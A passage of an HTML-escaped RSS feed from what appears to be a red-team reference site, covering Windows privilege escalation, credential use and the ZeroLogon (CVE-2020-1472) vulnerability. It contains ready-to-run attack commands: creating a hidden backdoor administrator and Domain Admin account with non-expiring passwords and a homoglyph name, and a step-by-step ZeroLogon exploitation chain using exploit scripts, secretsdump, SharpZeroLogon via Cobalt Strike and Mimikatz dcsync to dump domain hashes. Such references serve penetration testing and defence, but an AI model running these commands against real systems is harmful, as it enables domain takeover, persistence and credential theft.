&lt;li&gt;&lt;a href="#efspotato-ms-efsr-efsrpcopenfileraw"&gt;EFSPotato (MS-EFSR EfsRpcOpenFileRaw)&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="#printspoofer-printer-bug"&gt;PrintSpoofer (Printer Bug)&lt;/a&gt;))&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---privileged-file-write"&gt;EoP - Privileged File Write&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#diaghub"&gt;DiagHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#usodllloader"&gt;UsoDLLLoader&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wertrigger"&gt;WerTrigger&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wermgr"&gt;WerMgr&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---privileged-file-delete"&gt;EoP - Privileged File Delete&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---common-vulnerabilities-and-exposure"&gt;EoP - Common Vulnerabilities and Exposures&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#ms08-067-netapi"&gt;MS08-067 (NetAPI)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ms10-015-kitrap0d---microsoft-windows-nt200020032008xpvista7"&gt;MS10-015 (KiTrap0D)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ms11-080-afdsys---microsoft-windows-xp2003"&gt;MS11-080 (adf.sys)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ms15-051-client-copy-image---microsoft-windows-20032008782012"&gt;MS15-051 (Client Copy Image)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64"&gt;MS16-032&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ms17-010-eternal-blue"&gt;MS17-010 (Eternal Blue)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cve-2019-1388"&gt;CVE-2019-1388&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#eop---path-interception"&gt;EoP - $PATH Interception&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/PowerShellMafia/PowerSploit"&gt;PowerSploit&amp;rsquo;s PowerUp&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Windows - Using credentials</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/windows-using-credentials/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/windows-using-credentials/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#get-credentials"&gt;Get Credentials&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#create-credential"&gt;Create Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#looting-credentials"&gt;Looting Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#guest-credential"&gt;Guest Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#retail-credential"&gt;Retail Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#sandbox-credential"&gt;Sandbox Credential&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#netexec"&gt;NetExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#impacket"&gt;Impacket&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#psexec"&gt;PSExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wmiexec"&gt;WMIExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#smbexec"&gt;SMBExec&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#rdp-remote-desktop-protocol"&gt;RDP Remote Desktop Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-remoting-protocol"&gt;Powershell Remoting Protocol&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#powershell-credentials"&gt;Powershell Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-pssession"&gt;Powershell PSSESSION&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-secure-string"&gt;Powershell Secure String&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#ssh-protocol"&gt;SSH Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#winrm-protocol"&gt;WinRM Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wmi-protocol"&gt;WMI Protocol&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#other-methods"&gt;Other Methods&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#psexec---sysinternals"&gt;PsExec - Sysinternals&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mount-a-remote-share"&gt;Mount a remote share&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#run-as-another-user"&gt;Run as another user&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="get-credentials" class="anchored-heading"&gt;Get Credentials&lt;a class="heading-anchor" href="#get-credentials" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="create-credential" class="anchored-heading"&gt;Create Credential&lt;a class="heading-anchor" href="#create-credential" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="n"&gt;Hcker_12345678&lt;/span&gt;&lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Y&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;localgroup&lt;/span&gt; &lt;span class="n"&gt;administrators&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;localgroup&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Remote Desktop Users&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="c"&gt;# RDP access&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;localgroup&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Backup Operators&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="c"&gt;# Full access to files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="nb"&gt;group &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Domain Admins&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# enable a domain user account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ACTIVE&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;YES&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# prevent users from changing their password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Passwordchg&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;No&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# prevent the password to expire&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;hacker&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Expires&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Never&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# create a machine account (not shown in net users)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;net&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="n"&gt;evilbob&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;evilpassword&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# homoglyph Aԁmіnistratοr (different of Administrator)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Aԁmіnistratοr&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some info about your user&lt;/p&gt;</description></item><item><title>ZeroLogon</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/cve/zerologon/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/cve/zerologon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;CVE-2020-1472&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Spoofing the client credential&lt;/li&gt;
&lt;li&gt;Disabling signing and sealing&lt;/li&gt;
&lt;li&gt;Spoofing a call&lt;/li&gt;
&lt;li&gt;Changing a computer&amp;rsquo;s AD password to null&lt;/li&gt;
&lt;li&gt;From password change to domain admin&lt;/li&gt;
&lt;li&gt;:warning: reset the computer&amp;rsquo;s AD password in a proper way to avoid any Deny of Service&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Tools&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;cve-2020-1472-exploit.py&lt;/code&gt; - Python script from &lt;a href="https://github.com/dirkjanm"&gt;dirkjanm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Check (https://github.com/SecuraBV/CVE-2020-1472)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;proxychains&lt;/span&gt; &lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;zerologon_tester&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;DC01&lt;/span&gt; &lt;span class="mf"&gt;172.16&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dirkjanm&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;CVE&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2020&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1472&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;git&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Activate a virtual env to install impacket&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;venv&lt;/span&gt; &lt;span class="n"&gt;venv&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;source&lt;/span&gt; &lt;span class="n"&gt;venv&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;activate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;pip3&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Exploit the CVE (https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;proxychains&lt;/span&gt; &lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;cve&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2020&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1472&lt;/span&gt;&lt;span class="n"&gt;-exploit&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;DC01&lt;/span&gt; &lt;span class="mf"&gt;172.16&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Find the old NT hash of the DC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;proxychains&lt;/span&gt; &lt;span class="n"&gt;secretsdump&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-history&lt;/span&gt; &lt;span class="n"&gt;-just-dc-user&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DC01$&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-hashes&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;31d6cfe0d16ae931b73c59d7e0c089c0&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CORP/DC01$@DC01.CORP.LOCAL&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Restore password from secretsdump &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# secretsdump will automatically dump the plaintext machine password (hex encoded) &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# when dumping the local registry secrets on the newest version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;restorepassword&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;CORP&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="nv"&gt;@DC01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;CORP&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="n"&gt;-target-ip&lt;/span&gt; &lt;span class="mf"&gt;172.16&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;1&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;5&lt;/span&gt; &lt;span class="n"&gt;-hexpass&lt;/span&gt; &lt;span class="n"&gt;e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;deactivate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nccfsas&lt;/code&gt; - .NET binary for Cobalt Strike&amp;rsquo;s execute-assembly&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;nccgroup&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;nccfsas&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;execute-assembly&lt;/span&gt; &lt;span class="n"&gt;SharpZeroLogon&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="nb"&gt;win-dc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;vulncorp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Resetting the machine account password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;execute-assembly&lt;/span&gt; &lt;span class="n"&gt;SharpZeroLogon&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="nb"&gt;win-dc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;vulncorp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-reset&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Testing from a non Domain-joined machine&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;execute-assembly&lt;/span&gt; &lt;span class="n"&gt;SharpZeroLogon&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="nb"&gt;win-dc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;vulncorp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-patch&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Now reset the password back&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Mimikatz&lt;/code&gt; - 2.2.0 20200917 Post-Zerologon&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;privilege&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;debug&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Check for the CVE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lsadump&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;zerologon&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LAB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;account&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Exploit the CVE and set the computer account&amp;#39;s password to &amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lsadump&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;zerologon&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LAB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;account&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;exploit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Execute dcsync to extract some hashes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lsadump&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;dcsync&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;LAB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dc&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;DC01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LAB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span 